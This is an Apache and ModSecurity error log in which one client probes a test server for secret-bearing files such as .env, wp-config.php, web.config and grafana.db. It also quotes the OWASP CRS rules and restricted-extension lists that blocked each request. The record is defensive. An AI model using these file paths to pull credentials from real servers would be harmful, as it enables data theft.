[Mon Sep 30 03:12:44.149490 2024] [authz_core:error] [pid 2292852] [client 45.135.232.70:56352] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Mon Sep 30 03:12:44.151828 2024] [authz_core:error] [pid 2293094] [client 45.135.232.70:56444] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/svnserve.conf
[Mon Sep 30 03:12:44.153344 2024] [:error] [pid 2293082] [client 45.135.232.70:56270] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /srv/www/myproject/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/srv/www/myproject/.env"] [unique_id "Zvn7DOjkOZF_HPCCTMwlVQAAABU"]
[Mon Sep 30 03:12:44.549466 2024] [authz_core:error] [pid 2293118] [client 45.135.232.70:56450] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/venv
[Mon Sep 30 03:12:44.552807 2024] [:error] [pid 2293117] [client 45.135.232.70:56388] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/tsconfig.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /tsconfig.json found within REQUEST_FILENAME: /tsconfig.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/tsconfig.json"] [unique_id "Zvn7DNeO6pyz0_46IJyb1QAAACo"]
[Mon Sep 30 03:12:44.553111 2024] [:error] [pid 2293117] [client 45.135.232.70:56388] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/tsconfig.json"] [unique_id "Zvn7DNeO6pyz0_46IJyb1QAAACo"]
[Mon Sep 30 03:12:44.553285 2024] [:error] [pid 2293117] [client 45.135.232.70:56388] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/tsconfig.json"] [unique_id "Zvn7DNeO6pyz0_46IJyb1QAAACo"]
[Mon Sep 30 03:12:44.560778 2024] [:error] [pid 2293119] [client 45.135.232.70:56516] [client 45.135.232.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Zvn7DLhNUJ7xFmd9sJlvZQAAACw"]
[Mon Sep 30 03:12:44.560946 2024] [:error] [pid 2293119] [client 45.135.232.70:56516] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Zvn7DLhNUJ7xFmd9sJlvZQAAACw"]
[Mon Sep 30 03:12:44.571084 2024] [:error] [pid 2293119] [client 45.135.232.70:56516] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Zvn7DLhNUJ7xFmd9sJlvZQAAACw"]
[Mon Sep 30 03:12:44.571299 2024] [:error] [pid 2293119] [client 45.135.232.70:56516] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Zvn7DLhNUJ7xFmd9sJlvZQAAACw"]
[Mon Sep 30 03:12:44.575040 2024] [:error] [pid 2293104] [client 45.135.232.70:56704] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php-backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php-backup"] [unique_id "Zvn7DGmICwha5LRaBfZnnQAAACQ"]
[Mon Sep 30 03:12:44.575279 2024] [:error] [pid 2293104] [client 45.135.232.70:56704] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php-backup"] [unique_id "Zvn7DGmICwha5LRaBfZnnQAAACQ"]
[Mon Sep 30 03:12:44.575427 2024] [:error] [pid 2293104] [client 45.135.232.70:56704] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php-backup"] [unique_id "Zvn7DGmICwha5LRaBfZnnQAAACQ"]
[Mon Sep 30 03:12:44.585232 2024] [:error] [pid 2293063] [client 45.135.232.70:56528] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /usr/local/myapp/.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/usr/local/myapp/.env.prod"] [unique_id "Zvn7DKftDAs9z02W9bMAhQAAAAg"]
[Mon Sep 30 03:12:44.585429 2024] [:error] [pid 2293063] [client 45.135.232.70:56528] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/usr/local/myapp/.env.prod"] [unique_id "Zvn7DKftDAs9z02W9bMAhQAAAAg"]
[Mon Sep 30 03:12:44.585583 2024] [:error] [pid 2293063] [client 45.135.232.70:56528] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/usr/local/myapp/.env.prod"] [unique_id "Zvn7DKftDAs9z02W9bMAhQAAAAg"]
[Mon Sep 30 03:12:44.591711 2024] [authz_core:error] [pid 2292852] [client 45.135.232.70:57036] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Mon Sep 30 03:12:44.607508 2024] [:error] [pid 2293092] [client 45.135.232.70:56588] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wordpress/wp-content/uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wordpress/wp-content/uploads/.env"] [unique_id "Zvn7DPAoF0f7Ii-JO6H_xQAAABo"]
[Mon Sep 30 03:12:44.607732 2024] [:error] [pid 2293092] [client 45.135.232.70:56588] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wordpress/wp-content/uploads/.env"] [unique_id "Zvn7DPAoF0f7Ii-JO6H_xQAAABo"]
[Mon Sep 30 03:12:44.607893 2024] [:error] [pid 2293092] [client 45.135.232.70:56588] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wordpress/wp-content/uploads/.env"] [unique_id "Zvn7DPAoF0f7Ii-JO6H_xQAAABo"]
[Mon Sep 30 03:12:44.608485 2024] [:error] [pid 2293049] [client 45.135.232.70:57134] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /var/www/html/wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/var/www/html/wp-config.php"] [unique_id "Zvn7DESJuE_IczKl7y4umgAAAAY"]
[Mon Sep 30 03:12:44.608666 2024] [:error] [pid 2293049] [client 45.135.232.70:57134] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/var/www/html/wp-config.php"] [unique_id "Zvn7DESJuE_IczKl7y4umgAAAAY"]
[Mon Sep 30 03:12:44.608810 2024] [:error] [pid 2293049] [client 45.135.232.70:57134] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/var/www/html/wp-config.php"] [unique_id "Zvn7DESJuE_IczKl7y4umgAAAAY"]
[Mon Sep 30 03:12:44.614621 2024] [:error] [pid 2293095] [client 45.135.232.70:56686] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/yarn.lock" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /yarn.lock found within REQUEST_FILENAME: /yarn.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "Zvn7DNvptIuYti24ZwPapQAAAB0"]
[Mon Sep 30 03:12:44.614779 2024] [:error] [pid 2293095] [client 45.135.232.70:56686] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "Zvn7DNvptIuYti24ZwPapQAAAB0"]
[Mon Sep 30 03:12:44.614935 2024] [:error] [pid 2293095] [client 45.135.232.70:56686] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "Zvn7DNvptIuYti24ZwPapQAAAB0"]
[Mon Sep 30 03:12:44.615589 2024] [authz_core:error] [pid 2293115] [client 45.135.232.70:56700] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Mon Sep 30 03:12:44.955968 2024] [authz_core:error] [pid 2293104] [client 45.135.232.70:56990] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Mon Sep 30 03:12:44.991613 2024] [:error] [pid 2293117] [client 45.135.232.70:56944] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/lib/docker/volumes/myapp_data/_data/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/var/lib/docker/volumes/myapp_data/_data/.env"] [unique_id "Zvn7DNeO6pyz0_46IJyb1gAAACo"]
[Mon Sep 30 03:12:44.991866 2024] [:error] [pid 2293117] [client 45.135.232.70:56944] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/var/lib/docker/volumes/myapp_data/_data/.env"] [unique_id "Zvn7DNeO6pyz0_46IJyb1gAAACo"]
[Mon Sep 30 03:12:44.992049 2024] [:error] [pid 2293117] [client 45.135.232.70:56944] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/var/lib/docker/volumes/myapp_data/_data/.env"] [unique_id "Zvn7DNeO6pyz0_46IJyb1gAAACo"]
[Mon Sep 30 03:12:45.013701 2024] [authz_core:error] [pid 2293092] [client 45.135.232.70:56872] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Mon Sep 30 03:12:45.019155 2024] [authz_core:error] [pid 2293049] [client 45.135.232.70:56566] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Mon Sep 30 03:12:45.043046 2024] [authz_core:error] [pid 2293119] [client 45.135.232.70:57038] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Mon Sep 30 03:12:45.264884 2024] [authz_core:error] [pid 2293100] [client 45.135.232.70:57122] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Mon Sep 30 03:12:45.265453 2024] [authz_core:error] [pid 2293120] [client 45.135.232.70:56974] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Mon Sep 30 03:12:45.267196 2024] [authz_core:error] [pid 2293076] [client 45.135.232.70:56728] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Mon Sep 30 03:12:45.323132 2024] [:error] [pid 2293119] [client 45.135.232.70:56748] [client 45.135.232.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/var/lib/grafana/grafana.db"] [unique_id "Zvn7DbhNUJ7xFmd9sJlvZwAAACw"]
[Mon Sep 30 03:12:45.323463 2024] [:error] [pid 2293119] [client 45.135.232.70:56748] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/var/lib/grafana/grafana.db"] [unique_id "Zvn7DbhNUJ7xFmd9sJlvZwAAACw"]
[Mon Sep 30 03:12:45.323623 2024] [:error] [pid 2293119] [client 45.135.232.70:56748] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/var/lib/grafana/grafana.db"] [unique_id "Zvn7DbhNUJ7xFmd9sJlvZwAAACw"]
[Mon Sep 30 03:12:45.326722 2024] [:error] [pid 2293061] [client 45.135.232.70:56604] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Zvn7Df4plfEpgwUkwScOjwAAAAc"]
[Mon Sep 30 03:12:45.326934 2024] [:error] [pid 2293061] [client 45.135.232.70:56604] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Zvn7Df4plfEpgwUkwScOjwAAAAc"]
[Mon Sep 30 03:12:45.327088 2024] [:error] [pid 2293061] [client 45.135.232.70:56604] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Zvn7Df4plfEpgwUkwScOjwAAAAc"]
[Mon Sep 30 03:12:45.611552 2024] [authz_core:error] [pid 2292852] [client 45.135.232.70:57102] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Mon Sep 30 03:12:45.623203 2024] [authz_core:error] [pid 2293077] [client 45.135.232.70:56762] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/usr
[Mon Sep 30 03:12:45.624531 2024] [authz_core:error] [pid 2292828] [client 45.135.232.70:56960] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Mon Sep 30 03:12:45.629620 2024] [:error] [pid 2292831] [client 45.135.232.70:56652] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wordpress/wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wordpress/wp-config.php"] [unique_id "Zvn7Dab0PnYyMP2Lu2Ex1QAAAAQ"]
[Mon Sep 30 03:12:45.629838 2024] [:error] [pid 2292831] [client 45.135.232.70:56652] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wordpress/wp-config.php"] [unique_id "Zvn7Dab0PnYyMP2Lu2Ex1QAAAAQ"]
